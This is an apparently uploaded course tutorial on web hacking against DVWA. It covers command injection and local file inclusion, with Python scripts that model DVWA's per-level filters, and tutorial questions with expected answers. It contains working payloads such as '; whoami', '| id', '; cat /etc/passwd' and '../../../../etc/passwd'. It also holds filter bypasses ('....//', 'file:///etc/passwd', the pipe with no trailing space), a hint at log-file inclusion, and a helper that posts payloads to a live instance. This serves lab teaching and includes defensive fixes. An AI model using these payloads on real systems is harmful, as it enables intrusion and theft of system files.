Tutorial 6

The document outlines a Week 6 tutorial focused on web hacking, specifically targeting command injection and local file inclusion vulnerabilities using DVWA and Kali Linux. It provides detailed lab tasks for exploiting these vulnerabilities and includes instructions for capturing and modifying HTTP requests. Additionally, the tutorial poses questions regarding the differences between command injection and SQL injection, prevention methods for LFI vulnerabilities, and the implications of improper error handling in web applications.

Uploaded by Junaid Akram

Week 6 Tutorial – Web Hacking II (Lab Tasks + Questions)

Lab Task 1: Exploiting Command Injection Vulnerability


Objective: Understand and exploit command injection flaws in a web application.
Lab Environment:
- DVWA (Damn Vulnerable Web Application), run first at the Low security level so the basic payloads work, then repeated at Medium and High
- Kali Linux with Burp Suite and a browser proxied through it
Instructions:
1. Open DVWA in your browser and log in.
2. Navigate to the "Command Injection" module.
3. Enter 127.0.0.1 and observe the output: the page runs ping against your input and returns the command's raw output.
4. Now attempt to inject a command by appending ; whoami or && id to the input.
5. Capture the HTTP request in Burp Suite and send it to Repeater.
6. Modify and resend the request with variations to test different injection payloads.
7. Record the results and note the successful payloads.
8. Try the pipe (|) and background-execution (&) operators as well. DVWA's Medium level deletes ; and && from the input and High deletes several more separators (use the module's "View Source" button to read the blacklist), so which operator still works depends on the level.
Expected Outcome:
Students should be able to execute OS-level commands via the web input and confirm that
output is returned to the browser.
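The separator walk from steps 4 to 8, as an added example that is not part of the tutorial or of DVWA: a Python script that models the blacklist DVWA applies to the ip field at each security level (the deleted substrings are taken from DVWA's exec module source), reports which of the separators above still hand control to a second command after filtering, and can optionally post a payload to a live instance. The base URL, the PHPSESSID value and the /vulnerabilities/exec/ path are assumptions about your lab; only the form fields ip and Submit are DVWA's own.

```python
"""Pick a command-injection separator that survives DVWA's filter before you send it.

Added example, not DVWA's code. The per-level blacklists below are copied from
DVWA's vulnerabilities/exec/source/{low,medium,high}.php; PHP applies them with
str_replace, i.e. one left-to-right deletion pass per substring, in this order.
"""
import re
import urllib.parse
import urllib.request
from typing import List

FILTERS = {
    "low": [],
    "medium": ["&&", ";"],
    "high": ["&", ";", "| ", "-", "$", "(", ")", "`", "||"],
}

# Separators the lab asks you to try, each followed by `id` so success is easy
# to spot in the HTML. The last one has no space after the pipe on purpose.
CANDIDATES = [
    "127.0.0.1; id",
    "127.0.0.1 && id",
    "127.0.0.1 | id",
    "127.0.0.1 || id",
    "127.0.0.1 & id",
    "127.0.0.1|id",
]

# A second command has been started if one of these shell operators survives
# the filter and is followed by something to run.
SEPARATOR = re.compile(r"(;|&&|\|\||\||&|\n)\s*\S")

# `id` prints uid=NNNN(name); ping output never contains this.
MARKER = re.compile(r"uid=\d+\(")


def dvwa_filter(level: str, ip: str) -> str:
    """Return the string DVWA would hand to shell_exec('ping -c 4 ' . $target)."""
    for bad in FILTERS[level]:
        ip = ip.replace(bad, "")
    return ip


def still_injects(level: str, ip: str) -> bool:
    """True if the filtered input still chains a second command."""
    return SEPARATOR.search(dvwa_filter(level, ip)) is not None


def surviving_payloads(level: str) -> List[str]:
    """Subset of CANDIDATES that still inject at this level."""
    return [p for p in CANDIDATES if still_injects(level, p)]


def found_marker(html: str) -> bool:
    """Did the response body contain output from our injected `id`?"""
    return MARKER.search(html) is not None


def send_ping(base_url: str, phpsessid: str, security: str, ip: str) -> str:
    """POST one payload to DVWA's exec module and return the response body.

    Assumptions: DVWA is reachable at base_url, you already logged in and copied
    the PHPSESSID cookie from Burp, and the security cookie matches the level.
    """
    data = urllib.parse.urlencode({"ip": ip, "Submit": "Submit"}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/vulnerabilities/exec/", data=data)
    req.add_header("Cookie", f"PHPSESSID={phpsessid}; security={security}")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Offline: show what each level lets through. For a live run, fill in and uncomment:
    #   html = send_ping("http://127.0.0.1/dvwa", "<PHPSESSID>", "medium", "127.0.0.1 | id")
    #   print("injected" if found_marker(html) else "blocked")
    for level in FILTERS:
        for p in CANDIDATES:
            verdict = "INJECTS" if still_injects(level, p) else "blocked"
            print(f"{level:6} {p!r:22} -> {dvwa_filter(level, p)!r:22} {verdict}")
```

Run it once offline and you will see why the tutorial's ; and && payloads stop working at Medium while | and & keep going, and why at High the only survivors are the pipe with no trailing space and, through a quirk of the deletion order, the double pipe. Compare that table with what you observe in Repeater.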

Lab Task 2: File Inclusion Vulnerability (LFI)


Objective:
Demonstrate exploitation of a Local File Inclusion (LFI) vulnerability.
Lab Environment:
- DVWA or Mutillidae running on a local VM
- Kali Linux with a browser
Instructions:
1. Navigate to the File Inclusion section in DVWA.
2. Test the default input (?page=include.php) and change it to
?page=../../../../etc/passwd. How many ../ you need depends on where the fi/ directory sits below /; extra ../ are harmless once the path has reached the root, so add more if the first attempt fails, or try the absolute path ?page=/etc/passwd.
3. Try different traversal payloads to read system files:
o ?page=../../../../etc/hosts
o ?page=../../../../var/log/apache2/access.log (the web server log; anything included this way is parsed as PHP, which is what makes log files interesting targets)
4. Attempt to include a PHP file containing malicious code (if permitted in your environment).
5. Use Burp Suite to analyze the server response headers and content. At the Medium level DVWA strips ../ from the parameter and at High it only accepts values starting with "file" (or include.php itself), so compare the value you sent with the error the server returns.
Expected Outcome:
Students should successfully read restricted system files using directory traversal. They
should recognize how improper input validation leads to file disclosure.
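The traversal arithmetic behind step 2 and the bypasses for the higher DVWA levels, as an added example that is not part of the tutorial or of DVWA: a Python script that computes the path include() would open for a given ?page= value, models the filter DVWA applies at each level (rules taken from the fi module's source: Low passes the value through, Medium deletes http://, https:// and ../, High accepts only values matching file* or include.php), and ends with the allowlist-plus-containment resolver that answers tutorial question 2. The install path /var/www/html/dvwa and the page names in the allowlist are assumptions about a typical lab VM.

```python
"""Work out which ?page= payload reaches /etc/passwd through DVWA's fi module,
and what a fixed resolver looks like.

Added example, not DVWA's code. The per-level rules are modelled on DVWA's
vulnerabilities/fi/source/{low,medium,high}.php; the install path and the
names in ALLOWED_PAGES are assumptions about the lab VM.
"""
import fnmatch
import posixpath
from typing import List, Optional

FI_DIR = "/var/www/html/dvwa/vulnerabilities/fi"   # assumed location of DVWA's fi/ directory
ALLOWED_PAGES = {"include.php", "file1.php", "file2.php", "file3.php"}  # assumed allowlist


def resolve(include_dir: str, page: str) -> str:
    """Filesystem path include() would open for this value (no permission checks)."""
    if page.startswith("/"):
        return posixpath.normpath(page)
    # ../ components beyond the root collapse to /, exactly as the kernel resolves them.
    return posixpath.normpath(posixpath.join(include_dir, page))


def depth_to_root(include_dir: str) -> int:
    """How many ../ are needed from include_dir to reach /."""
    return len([c for c in include_dir.split("/") if c])


def dvwa_fi_filter(level: str, page: str) -> Optional[str]:
    """What reaches include() at this level, or None when DVWA rejects the value."""
    if level == "low":
        return page
    if level == "medium":
        for bad in ("http://", "https://", "../"):
            page = page.replace(bad, "")   # single pass, like PHP str_replace
        return page
    if level == "high":
        return page if fnmatch.fnmatch(page, "file*") or page == "include.php" else None
    raise ValueError(f"unknown level {level!r}")


def reaches_passwd(level: str, page: str) -> bool:
    """Does this payload make include() open /etc/passwd at this level?"""
    filtered = dvwa_fi_filter(level, page)
    if filtered is None:
        return False
    if filtered.startswith("file://"):        # the file:// wrapper is always available to include()
        filtered = filtered[len("file://"):]
    return resolve(FI_DIR, filtered) == "/etc/passwd"


def candidate_payloads(level: str) -> List[str]:
    """Payloads a student would try at each level, with enough ../ for FI_DIR."""
    n = depth_to_root(FI_DIR)
    if level == "low":
        return ["../" * n + "etc/passwd", "/etc/passwd"]
    if level == "medium":
        # "....//" turns into "../" after one deletion pass, so the traversal survives.
        return ["....//" * n + "etc/passwd"]
    return ["file:///etc/passwd"]


def safe_resolve(include_dir: str, page: str) -> Optional[str]:
    """The fix: allowlist the page name, then check the resolved path stays inside include_dir."""
    if page not in ALLOWED_PAGES:
        return None
    full = resolve(include_dir, page)
    if not full.startswith(include_dir.rstrip("/") + "/"):
        return None
    return full


if __name__ == "__main__":
    print("../ needed from", FI_DIR, "->", depth_to_root(FI_DIR))
    print("4 x ../ opens", resolve(FI_DIR, "../../../../etc/passwd"))
    for level in ("low", "medium", "high"):
        for p in candidate_payloads(level):
            verdict = "reads /etc/passwd" if reaches_passwd(level, p) else "blocked"
            print(f"{level:6} {p:45} -> {verdict}")
    print("safe_resolve('../../etc/passwd') ->", safe_resolve(FI_DIR, "../../etc/passwd"))
```

With the assumed install path, four ../ only reach /var/www, which is why the tutorial's first payload may fail on your VM; six (or more) reach /. The allowlist resolver never touches the traversal string at all, which is the point of question 2: the fix is to stop deriving a path from user input, not to strip dangerous characters from it.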

Tutorial Questions:
1. What are the key differences between Command Injection and SQL Injection
vulnerabilities? Provide examples of each.
(Expected answer: Command Injection passes input to an OS shell, so the payload is shell syntax, e.g. 127.0.0.1; cat /etc/passwd, and the impact is code execution as the web server user. SQL Injection passes input to a database query, so the payload is SQL syntax, e.g. ' OR '1'='1, and the impact is reading or changing data. The fixes differ too: avoid invoking a shell with user input at all, or allowlist the input, versus parameterized queries.)
2. How can developers prevent Local File Inclusion (LFI) vulnerabilities in PHP
applications?
(Expected answer: do not build include paths from raw input; allowlist the permitted page names and map them to fixed files; if a path must be computed, resolve it with realpath() and verify it stays under the intended directory; keep allow_url_include off and consider open_basedir; avoid dynamic includes in the design where possible.)
3. Explain the security implications of improper error handling in web applications,
especially in the context of web hacking. Provide an example from your lab.
(Expected answer: verbose errors reveal file paths, database types and versions, and other system details that guide the next payload. Example: at DVWA's Low level a failed include raises a PHP warning that prints the full path of the vulnerable script, which tells the attacker exactly how many ../ the traversal needs; the generic "file not found" message DVWA returns at High gives away far less.)
